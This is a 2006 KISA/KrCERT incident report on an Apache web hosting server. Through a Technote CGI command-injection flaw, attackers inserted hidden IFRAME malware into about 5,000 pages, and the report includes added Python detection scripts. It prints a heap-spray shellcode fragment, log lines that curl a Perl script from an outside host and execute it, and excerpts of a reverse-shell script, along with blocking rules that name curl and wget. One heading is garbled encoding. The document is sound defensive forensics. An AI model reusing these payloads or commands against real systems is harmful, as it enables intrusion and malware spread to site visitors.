[Source: Korea Information Security Agency (KISA)]
KISC
Internet Incident Response Support Center - 2 -
1. Overview
The Internet Incident Response Support Center of the Korea Information Security Agency uses MCFinder (Malicious Code Finder), a detection program for sites hosting hidden malicious code that was developed in-house, to detect and remediate websites that have been hacked and had malicious code inserted so that they can infect their visitors.
From January to May 2006, about 2,000 malware distribution and relay sites were found and remediated; about 70 of these web servers were Apache web servers.
We analyzed the Apache web server of company H, which MCFinder had found to be distributing malicious code.
The analysis showed that the system had been attacked from the United States and that a vulnerability in Technote had been exploited in the attack.
The web server was a web hosting server running about 350 websites, and malicious code had been inserted into every index file of those sites (about 5,000 files).
This contrasts with typical malware distribution and relay sites, which are attacked through SQL Injection vulnerabilities and have malicious code hidden only in specific places such as the initial page or a Flash file. Here a vulnerability in Technote, a public bulletin board program used in Korea, was used to hide malicious code in every index file of every site running on the web hosting server, which deserves attention.
In addition, many servers in Korea and abroad were used during this hacking process, for example to download malicious code, and a neglected dormant domestic website was itself hacked and then used for a Reverse Connection. The Ministry of Information and Communication and KISA ran a dormant website cleanup campaign last June, and this incident shows how dangerous dormant websites are.
2. Analysis of the Malware Distribution Website
¡à ȨÆäÀÌÁö Ãʱâȸ鿡 ¾Ç¼ºÄÚµå »ðÀÔ
MCFinder´Â ±¹³» H ±â¾÷ÀÇ È¨ÆäÀÌÁö¿¡¼ ´ÙÀ½°ú °°Àº ¾Ç¼ºÄڵ带 ŽÁöÇÏ¿´´Ù.
KrCERT-IN-2006-03 http://www.krcert.or.kr
Case of Malware Distribution from an Apache Web Server cert@krcert.or.kr
The malicious code was encoded to hinder detection. Decoding it shows that it used IFRAME tags to connect visitors to specific sites:
<script language=javascript>document.write(unescape('<IFRAME SRC="http://xxx.info/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME><IFRAME SRC="http://xxxproxies.com/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>'))</script>
Of the two sites linked from the IFRAMEs, xxx.info resolved to an IP address allocated to Norway, and the other site (xxxproxies.com) did not resolve to an IP address at the time of analysis.
□ Malicious code inserted into about 5,000 web pages of 350 websites
To analyze the affected website we examined the web hosting server, and found that not only the reported site but every index file of all 350 websites on the server had been infected with the malicious code.
[root@linux conf]# grep "<VirtualHost" httpd.conf | grep -v "#" | wc -l
350
[root@linux home]# grep "write(unescape('%3c%49%" -R . |wc -l
5,164
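The two steps shown above, decoding the document.write(unescape(...)) wrapper and sweeping the hosting server for every index file that carries it, can be combined into one triage script. The following Python is an added example and not part of the KrCERT report; the sample page is constructed here in the same %XX form that the grep pattern above matches, and the host name xxx.info is the redacted one from the report.

```python
import os
import re
from urllib.parse import unquote

# document.write(unescape('...')) wrapper seen in the injected index files
_WRITE_UNESCAPE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])(?P<payload>.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL)
_IFRAME_TAG = re.compile(r"<iframe[^>]*>", re.IGNORECASE)
_SRC = re.compile(r"\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)
# a 0x0 frame or display:none marks the frame as hidden from the visitor
_HIDDEN = re.compile(r"(width|height)\s*=\s*['\"]?0\b|display\s*:\s*none", re.IGNORECASE)

def decode_unescape(payload):
    """Decode what JavaScript unescape() would: %uXXXX code units first, then %XX bytes."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), payload)
    return unquote(text)

def find_injected_iframes(html):
    """Return [(src, hidden), ...] for every IFRAME emitted by a document.write(unescape()) call."""
    found = []
    for m in _WRITE_UNESCAPE.finditer(html):
        for tag in _IFRAME_TAG.findall(decode_unescape(m.group("payload"))):
            src = _SRC.search(tag)
            if src:
                found.append((src.group(1), bool(_HIDDEN.search(tag))))
    return found

def scan_tree(root, names=("index.htm", "index.html", "index.php")):
    """Walk a hosting tree (e.g. /home) and map each infected index file to its IFRAME sources."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() in names:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    frames = find_injected_iframes(fh.read())
                if frames:
                    hits[path] = frames
    return hits

# Constructed sample page: one hidden IFRAME, percent-encoded as the report's grep pattern expects
SAMPLE_INDEX = (
    "<html><body><h1>Welcome</h1><script language=javascript>document.write(unescape('"
    "%3c%49%46%52%41%4d%45%20SRC%3d%22http%3a%2f%2fxxx.info%2fout.php%3fs_id%3d1%22"
    "%20WIDTH%3d0%20BORDER%3d0%20HEIGHT%3d0%20style%3d%22display%3anone%22%3e%3c%2fIFRAME%3e"
    "'))</script></body></html>")
```

Running scan_tree over the hosting root reproduces the report's grep count per file and, unlike the grep, tells you which external hosts the frames point at so they can be blocked at the perimeter.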
In addition, JavaScript code encoded with 4-digit %uXXXX escapes, presumed to attack a buffer overflow vulnerability in Internet Explorer, had been inserted into many web pages, as shown below.
<scRIPT language="javascript">
shellcode =
unescape("%u4343%u4343"+"%u0eeb%u4b5b%uc933%uf7b1%u3480%uee0b%ufae2%u05eb%uede
<omitted>
6%uc182%u9c9a%u8bc0%u8b96%u00ee");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
<omitted>
memory = new Array();
for (i=0;i<750;i++) memory[i] = block + shellcode;
</scRIPT>
□ Malicious Bot infection on visiting a web page with the inserted malicious code
When an ordinary Internet user visits a web page carrying the inserted JavaScript code, a file named a.exe is created under the C:\WinNT\system32 folder.
The malware also writes a value named msgfix.exe into several registry keys so that it is started again after the system reboots.
The a.exe program was observed connecting to port 6667 on xxx.xxx.206.93, an IP address allocated to France.
Antivirus products diagnose the a.exe program as a variant of SDBot with backdoor functionality.
In other words, the malicious code inserted into the website attacks visitors through an IE vulnerability and then connects them to a specific malicious Bot C&C (command and control) server, from which they are remotely controlled.
□ Web log analysis results
Analysis of the victim server's web logs showed that attacks on the Technote vulnerability from IP addresses allocated to the United States had succeeded on two days, June 17 and June 28. The attack is summarized as follows.
o Attack dates: June 17 and June 28, 2006
o Attack IPs: xxx.xxx.201.79 (University O, USA), xxx.xxx.103.4 (University R, USA)
o Attack method: exploitation of a parameter input validation flaw in the Technote CGI program
- The Technote CGI program does not validate its parameter input, so shell commands placed after a pipe (|) character are executed; this vulnerability was exploited
o Notable point: hacking tools installed with the curl command
- The wget command is usually used to fetch hacking tools when Linux servers are hacked, for example for website defacement, but in this incident the curl command was used
- curl was used to write a Perl script named cbd into the /tmp directory, which was then executed
※ curl is a command that transfers files to and from remote servers over protocols such as HTTP, HTTPS and FTP
access_log.1:xxx.xxx.201.79 - - [28/Jun/2006:22:37:37 +0900] "GET /cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_BOARD&command=down_load&filename=index.htm|cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl%20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21| HTTP/1.1" 200 0
...
access_log.2:xxx.xxx.103.4 - - [17/Jun/2006:11:28:31 +0900] "GET /cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_BOARD&command=down_load&filename=index.htm|cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl%20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21| HTTP/1.1" 200 0
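To turn the log evidence above into a repeatable check, the following Python, an added example that is not from the KrCERT report, parses Apache access_log lines, URL-decodes each query parameter and flags values in which a pipe or semicolon is followed by a shell command name, the same idea as the ModSecurity ARGS_VALUES rule in Section 3. The sample lines are constructed from the redacted entries above with a shorter cd chain; the second line is a benign download for contrast.

```python
import re
from urllib.parse import unquote

# Apache access_log prefix, with the optional "filename:" prefix that grep -R prints
_LOG = re.compile(
    r'^(?:[\w.]+:)?(?P<ip>[\w.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)')
# a shell command name directly after a pipe or semicolon inside a decoded parameter value
SHELL_CMDS = ("ls", "id", "pwd", "wget", "curl", "perl", "cd", "sh", "nc")
_INJECT = re.compile(r"[|;]\s*(" + "|".join(SHELL_CMDS) + r")\b", re.IGNORECASE)

def parse_line(line):
    """Split one access_log line into its fields and its URL-decoded (name, value) query pairs."""
    m = _LOG.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"], _, query = rec["target"].partition("?")
    # split on & only: ';' is a shell separator in this attack, not a query separator
    rec["args"] = [tuple(unquote(p) for p in pair.partition("=")[::2])
                   for pair in query.split("&") if pair]
    return rec

def find_command_injection(lines):
    """Return one finding per log line whose decoded parameter values carry a shell command chain."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["args"]:
            cmds = [c.lower() for c in _INJECT.findall(value)]
            if cmds:
                findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                                 "param": name, "commands": cmds, "status": int(rec["status"])})
    return findings

# Constructed sample: the report's redacted attack entry (shortened cd chain) plus one benign download
SAMPLE_LOG = [
    'xxx.xxx.201.79 - - [28/Jun/2006:22:37:37 +0900] "GET /cgi-bin/technote/main.cgi?down_num=1078999704'
    '&board=INT_BOARD&command=down_load&filename=index.htm|cd%20..;cd%20..;cd%20tmp;'
    'curl%20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21| HTTP/1.1" 200 0',
    'xxx.xxx.50.7 - - [28/Jun/2006:22:40:01 +0900] "GET /cgi-bin/technote/main.cgi?board=INT_BOARD'
    '&command=down_load&filename=report.pdf HTTP/1.1" 200 8142',
]
```

A status of 200 on a flagged line, as in the report, means the CGI accepted the request, so such hits should be treated as likely successful executions rather than blocked attempts.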
□ Hacking tools installed in the /tmp directory
Hacking-related programs had also been installed in /tmp, the directory attackers generally prefer for installing their tools.
[root@linux tmp]# ls -alc
-rwxr-xr-x 1 nobody nobody 452101 Jun 28 22:37 brk2
-rw-rw-rw- 1 nobody nobody 546 Jun 28 22:32 cbd
The cbd script appears to be a Perl script for establishing a Reverse Connection to a specific site.
[root@linux tmp]# cat cbd
#!/usr/bin/perl
$ARGC=@ARGV;
$shell = '/bin/sh';
print "
-+++++cbd by doberman+++++-
";
<omitted>
connect(SOCKET, sockaddr_in($ARGV[1] || '3333', inet_aton($ARGV[0] || 'xxx.xxx.222.21')))
or die print "
unable connect to host bad port?
";
<omitted>
system("pwd;id;uname -a;cat /etc/*release;cat /proc/version");
system($shell);
The compromised server's firewall had been configured to allow telnet access only from specific IP addresses, in order to block unauthorized remote telnet connections; the attacker used a Reverse Connection to bypass this restriction.
The address xxx.xxx.222.21 in the cbd script belonged to a dormant website that domestic company B had left neglected without formally launching it. That server was a Linux Apache web server with many open ports, was in a weak security state, and appears to have already been hacked. The following screen shows company B's website.
The server was running SSH services on both port 22 and port 3332, and port 3332 appears to have been used as a backdoor. The Perl script found earlier on the E web hosting server was set to connect to port 3333, so the attacker appears to change the port periodically.
22 SSH Remote Login Protocol
|___ SSH-1.99-OpenSSH_3.1p1.
3332
|___ SSH-1.5-2.0.13.
When the volatile information of the victim web hosting server was analyzed, the network connection table still held a trace of the Reverse Connection to port 3333 of company B.
[root@linux root]# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 8 0 xxx.xxx.20.63:45672 xxx.xxx.222.21:3333 CLOSE_WAIT 26587/
Another hacking program (brk2) found in the /tmp directory of the victim web hosting server is a binary that appears to obtain root privileges by exploiting a Linux kernel security vulnerability.
[root@linux tmp]# strings brk2
<omitted>
[-] %s: %s
[-] Unable to exit, entering neverending loop.
Kernel seems not to be vulnerable
double allocation
Unable to determine kernel address
Unable to set up LDT
Unable to change page protection
Invalid LDT entry
Unable to jump to call gate
/bin/sh
Unable to spawn shell
PATH=/usr/bin:/bin:/usr/sbin:/sbin
Unable to allocate memory
Unable to unmap stack
<rest omitted>
The victim server was running Linux kernel version 2.4.20.
[root@linux root]# uname -a
Linux xxx.co.kr 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
Linux kernel version 2.4.20 contains various vulnerabilities, including ones that allow an ordinary user to obtain root privileges.
In summary, the attacker is presumed to have used the Technote vulnerability to establish a Reverse Connection through the cbd backdoor with web server privileges (nobody), obtained root privileges with the brk2 hacking program, and then inserted malicious code into every website.
3. Conclusions and Countermeasures
This incident has several characteristics that distinguish it from previous incidents and offers the following lessons.
First, a public bulletin board vulnerability was used to distribute malicious code.
Besides the SQL Injection attacks seen before, a security vulnerability in Technote, a public bulletin board program, was also used for malware distribution. This suggests that malware could also be distributed through vulnerabilities in Zeroboard, the most widely used bulletin board program in Korea.
Second, small and medium-sized websites on web hosting services were used to distribute malicious code.
Previously, mainly large websites with many visitors, such as news sites, were targeted; here malicious code was inserted into hundreds of small and medium-sized websites hosted on a web hosting service. Website defacement has so far been the most typical damage to the Apache web servers of web hosting companies, but it should be noted that Apache web servers are now also being abused for the more criminal purpose of malware distribution.
Third, a dormant domestic website served as a host for the hacking.
Company B's website, which had been left neglected while being prepared for launch, was used for a Reverse Connection, a case of a neglected dormant website being used in a hacking incident. In a survey of dormant websites conducted by the Internet Incident Response Support Center last May, hacked websites were about twice as likely to be dormant as websites in general (14.5% of all websites were dormant, versus about 30% of hacked websites). The survey thus showed that dormant websites are also more likely to be hacked, and in this incident too a dormant website was abused for hacking.
Security countermeasures for this incident are as follows.
First, apply the latest security patch for Technote.
Install the official 「Technote PHP6」 version released on February 22, 2006 from the Technote website (http://www.technote.co.kr/).
Second, patch to the latest Linux kernel.
Many recent Linux kernel vulnerabilities allow a local user to obtain root privileges. Therefore download and install the latest Linux kernel from http://www.kernel.org/.
Third, strengthen security with ModSecurity, the open-source web application firewall for Apache.
Install and operate ModSecurity by referring to the following technical document.
www.krcert.or.kr → Security Information → Technical Documents → “Apache Web Server Security Using ModSecurity”
To block attacks such as this one, which placed commands like curl in URL parameter values, the following rules can be applied in ModSecurity. (The rules use the SecFilterSelective syntax of ModSecurity 1.x; ModSecurity 2.x replaced it with SecRule.)
SecFilterSelective HTTP_User-Agent "(libwhisker|paros|wget|libwww|perl|curl|java)"
SecFilterSelective ARGS "<script"
SecFilterSelective ARGS "javascript:"
SecFilterSelective ARGS_VALUES ";[[:space:]]*(ls|id|pwd|wget|curl)"
SecFilterSelective ARGS_VALUES "^http:/"
Fourth, ordinary users must keep the latest security patches applied.
In this incident too, the PC of an ordinary user without security patches could be infected with a malicious Bot simply by visiting a website. Therefore apply security patches for the OS and IE regularly, and where possible enable the “automatic security update” feature.